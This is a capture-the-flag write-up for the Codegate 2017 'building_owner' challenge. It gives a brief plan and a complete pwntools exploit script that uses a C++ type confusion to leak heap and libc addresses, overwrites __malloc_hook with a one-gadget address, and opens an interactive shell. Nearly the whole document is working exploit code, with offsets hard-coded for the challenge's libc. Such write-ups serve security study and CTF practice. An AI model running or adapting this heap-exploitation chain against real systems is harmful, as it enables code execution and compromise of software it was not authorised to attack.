Codegate 2017 building_owner
Type confusion
c++분석하느라 애먹었다 ㅠㅠㅠ
root@noe:~/pwnchal# ./checksec.sh --file noe.systems/owner
RELRO STACK CANARY NX PIE RPATH RUNPATH FILE
Full RELRO Canary found NX enabled PIE enabled No RPATH No RUNPATH noe.systems/owner
1. Apartment에서 Restaurant로 type change해서 fd, bk leak
2. pointer 이용해서 main_arena+88 leak
3. pointer 이용해서 malloc_hook overwrite
4. get shell
from pwn import *
s = process('./owner')  # local run of the challenge binary; this pwntools tube is the shared connection every helper below talks to
def add(name, floor, house, some):
    """Menu 1: create an Apartment by answering the four prompts in order.

    name / some are sent as-is, floor and house are sent as decimal strings.
    Every prompt the binary emits is echoed to stdout, as the rest of this
    script does, so the transcript can be followed while the script runs.
    """
    def reply(prompt, value):
        # wait for the prompt, then answer it on one line
        print s.recvuntil(prompt)
        s.sendline(value)

    reply('> ', '1')
    reply('name?', name)
    reply('How many floor on your apartment? ', str(floor))
    reply('How many house in each floor? ', str(house))
    reply('Describe something about it : ', some)
def edit(edit_type, edit_number):
    """Menu 4 -> 1: open the edit sub-menu for object (edit_type, edit_number).

    Only the four menu answers are sent here; the caller continues the
    conversation from the next prompt (the original author's note "-1 -1"
    appears to refer to the answers that back out of the sub-menus, which
    the callers in this script send themselves).
    """
    for answer in ('4', '1', str(edit_type), str(edit_number)):
        print s.recvuntil('> ')
        s.sendline(answer)
def change(change_type, change_number, change_kind):
    """Menu 4 -> 2: change object (change_type, change_number) to change_kind.

    After the three selectors are sent, two '-1' answers follow; from the
    menu flow these appear to leave the sub-menus again so the caller is
    back at the top-level prompt (inferred from usage, not verified here).
    """
    answers = [
        '4', '2',
        str(change_type), str(change_number), str(change_kind),
        '-1', '-1',
    ]
    for answer in answers:
        print s.recvuntil('> ')
        s.sendline(answer)
# Two Apartments are created; the blocking raw_input() between them is a
# manual pause (presumably to inspect the process state before the second
# allocation - not needed for the exploit flow itself).
add('A'*8, 1, 1, 'A'*8)
raw_input()
add('B'*8, 1, 1, 'B'*8)
# Step 1 of the plan above: re-type Apartment #1 as a Restaurant. The binary
# keeps using the same object through the new view (the type confusion this
# writeup is about), so Restaurant fields alias Apartment fields.
change(1, 1, 2)
edit(3, 1)
# The "Normal price of menu" field of the confused object now prints a heap
# pointer (the fd/bk leak from the plan).
print s.recvuntil('Normal price of menu : ')
heap_leak = int(s.recvuntil('\n')[:-1])
# Fixed offset from the leaked pointer to the chunk used for the next leak;
# specific to this binary's heap layout.
heap_for_leak = heap_leak + 0x1e0
log.info('heap_leak : ' + hex(heap_leak))
log.info('heap_for_leak : ' + hex(heap_for_leak))
# Step 2: through the confused view, write the chosen heap address into the
# "price" field (menu 6), which the Apartment view treats as a pointer.
print s.recvuntil('> ')
s.sendline('6')
print s.recvuntil('Enter normal price of menu : ')
s.sendline(str(heap_for_leak))
# Menu 1: set a 0x100-byte name; the size matters for the leak that follows
# (the writeup's step 2, main_arena+88).
print s.recvuntil('> ')
s.sendline('1')
print s.recvuntil('Enter new name : ')
s.sendline('A' * 0x100)
print s.recvuntil('> ')
s.sendline('-1')
print s.recvuntil('> ')
s.sendline('1')
#print s.recvuntil('>').encode('hex')
# Read the 6 raw address bytes printed after "1. " and widen to 8 bytes.
print s.recvuntil('1. ')
libc_leak = u64(s.recv(6).ljust(8, '\x00'))
# NOTE(review): these three constants are hard-coded for the libc the
# challenge shipped with (inferred from the writeup; not verifiable from
# this page). The script has no check that the leak looks like a libc
# address before using it.
libc_base = libc_leak - 3939160
malloc_hook = libc_base + 3939056
oneshot = libc_base + 0x45526
log.info('libc_leak : ' + hex(libc_leak))
log.info('libc_base : ' + hex(libc_base))
log.info('malloc_hook : ' + hex(malloc_hook))
log.info('oneshot : ' + hex(oneshot))
# Step 3: back out, then point the confused object's "price" field at
# __malloc_hook (menu 3 -> 1 -> 6).
print s.recvuntil('> ')
s.sendline('-1')
print s.recvuntil('> ')
s.sendline('3')
print s.recvuntil('> ')
s.sendline('1')
print s.recvuntil('> ')
s.sendline('6')
print s.recvuntil('menu : ')
s.sendline(str(malloc_hook))
# The "name" write now lands at the address set above, so the 8-byte value
# overwrites the hook.
print s.recvuntil('> ')
s.sendline('-1')
print s.recvuntil('> ')
s.sendline('1')
print s.recvuntil('> ')
s.sendline('1')
print s.recvuntil('> ')
s.sendline('1')
print s.recvuntil('name : ')
s.sendline(p64(oneshot))
# Step 4: leave the sub-menus and take menu 3 -> 5, which (per the plan)
# triggers an allocation so the overwritten hook runs; then hand the tube
# to the user.
print s.recvuntil('> ')
s.sendline('-1')
print s.recvuntil('> ')
s.sendline('-1')
print s.recvuntil('> ')
s.sendline('3')
print s.recvuntil('> ')
s.sendline('5')
s.interactive()